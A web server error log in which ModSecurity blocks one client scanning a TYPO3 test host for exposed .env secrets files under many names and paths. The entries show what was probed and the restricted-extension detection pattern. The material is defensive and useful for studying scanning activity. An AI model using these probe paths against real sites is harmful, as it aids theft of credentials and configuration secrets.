[hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTKOQ4KEfmkzHJNA4jGpXwAAAGQ"]
[Fri Dec 05 08:48:19.675535 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTKOQ4KEfmkzHJNA4jGpXwAAAGQ"]
[Fri Dec 05 08:48:19.675753 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTKOQ4KEfmkzHJNA4jGpXwAAAGQ"]
[Fri Dec 05 08:48:19.675928 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTKOQ4KEfmkzHJNA4jGpXwAAAGQ"]
[Fri Dec 05 08:48:21.791501 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKORYKEfmkzHJNA4jGpYAAAAGQ"]
[Fri Dec 05 08:48:21.791627 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKORYKEfmkzHJNA4jGpYAAAAGQ"]
[Fri Dec 05 08:48:21.791864 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKORYKEfmkzHJNA4jGpYAAAAGQ"]
[Fri Dec 05 08:48:21.792058 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKORYKEfmkzHJNA4jGpYAAAAGQ"]
[Fri Dec 05 08:48:31.627221 2025] [:error] [pid 531697] [client 195.178.110.155:33644] [client 195.178.110.155] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKOT-qgQSN2J6Cu49vRLQAAAIA"]
[Fri Dec 05 08:48:31.627349 2025] [:error] [pid 531697] [client 195.178.110.155:33644] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKOT-qgQSN2J6Cu49vRLQAAAIA"]
[Fri Dec 05 08:48:31.627559 2025] [:error] [pid 531697] [client 195.178.110.155:33644] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKOT-qgQSN2J6Cu49vRLQAAAIA"]
[Fri Dec 05 08:48:31.627748 2025] [:error] [pid 531697] [client 195.178.110.155:33644] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTKOT-qgQSN2J6Cu49vRLQAAAIA"]
[Fri Dec 05 08:48:37.566045 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aTKOVSzhE94da41W-WGHsAAAAH4"]
[Fri Dec 05 08:48:37.566408 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aTKOVSzhE94da41W-WGHsAAAAH4"]
[Fri Dec 05 08:48:37.566616 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aTKOVSzhE94da41W-WGHsAAAAH4"]
[Fri Dec 05 08:48:37.598131 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTKOVSzhE94da41W-WGHsQAAAH4"]
[Fri Dec 05 08:48:37.598584 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTKOVSzhE94da41W-WGHsQAAAH4"]
[Fri Dec 05 08:48:37.598877 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTKOVSzhE94da41W-WGHsQAAAH4"]
[Fri Dec 05 08:48:37.631040 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTKOVSzhE94da41W-WGHsgAAAH4"]
[Fri Dec 05 08:48:37.631476 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTKOVSzhE94da41W-WGHsgAAAH4"]
[Fri Dec 05 08:48:37.631834 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTKOVSzhE94da41W-WGHsgAAAH4"]
[Fri Dec 05 08:48:37.667549 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTKOVSzhE94da41W-WGHswAAAH4"]
[Fri Dec 05 08:48:37.667797 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTKOVSzhE94da41W-WGHswAAAH4"]
[Fri Dec 05 08:48:37.667998 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTKOVSzhE94da41W-WGHswAAAH4"]
[Fri Dec 05 08:48:37.694507 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aTKOVSzhE94da41W-WGHtAAAAH4"]
[Fri Dec 05 08:48:37.694753 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aTKOVSzhE94da41W-WGHtAAAAH4"]
[Fri Dec 05 08:48:37.694978 2025] [:error] [pid 531695] [client 195.178.110.155:44180] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aTKOVSzhE94da41W-WGHtAAAAH4"]
[Fri Dec 05 08:48:37.732765 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:44180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.swp
[Fri Dec 05 08:48:37.765837 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:44180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Fri Dec 05 08:48:40.362127 2025] [:error] [pid 531696] [client 195.178.110.155:44196] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTKOWHjGt1q64mrfR9wdSQAAAH8"]
[Fri Dec 05 08:48:40.362383 2025] [:error] [pid 531696] [client 195.178.110.155:44196] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTKOWHjGt1q64mrfR9wdSQAAAH8"]
[Fri Dec 05 08:48:40.362572 2025] [:error] [pid 531696] [client 195.178.110.155:44196] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTKOWHjGt1q64mrfR9wdSQAAAH8"]
[Fri Dec 05 08:48:53.318610 2025] [:error] [pid 532226] [client 195.178.110.155:50640] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTKOZe0tnvJIONeyH4oeNAAAAAE"]
[Fri Dec 05 08:48:53.318884 2025] [:error] [pid 532226] [client 195.178.110.155:50640] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTKOZe0tnvJIONeyH4oeNAAAAAE"]
[Fri Dec 05 08:48:53.319115 2025] [:error] [pid 532226] [client 195.178.110.155:50640] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTKOZe0tnvJIONeyH4oeNAAAAAE"]
[Fri Dec 05 08:49:04.348209 2025] [:error] [pid 532219] [client 195.178.110.155:50272] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTKOcD6l5AnsUvdIyDecdgAAAAM"]
[Fri Dec 05 08:49:04.348485 2025] [:error] [pid 532219] [client 195.178.110.155:50272] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTKOcD6l5AnsUvdIyDecdgAAAAM"]
[Fri Dec 05 08:49:04.348682 2025] [:error] [pid 532219] [client 195.178.110.155:50272] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTKOcD6l5AnsUvdIyDecdgAAAAM"]
[Fri Dec 05 08:49:12.536125 2025] [:error] [pid 531700] [client 195.178.110.155:55180] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTKOePjYAO6Jy5EVgXUuiAAAAIM"]
[Fri Dec 05 08:49:12.536370 2025] [:error] [pid 531700] [client 195.178.110.155:55180] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTKOePjYAO6Jy5EVgXUuiAAAAIM"]
[Fri Dec 05 08:49:12.536594 2025] [:error] [pid 531700] [client 195.178.110.155:55180] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTKOePjYAO6Jy5EVgXUuiAAAAIM"]
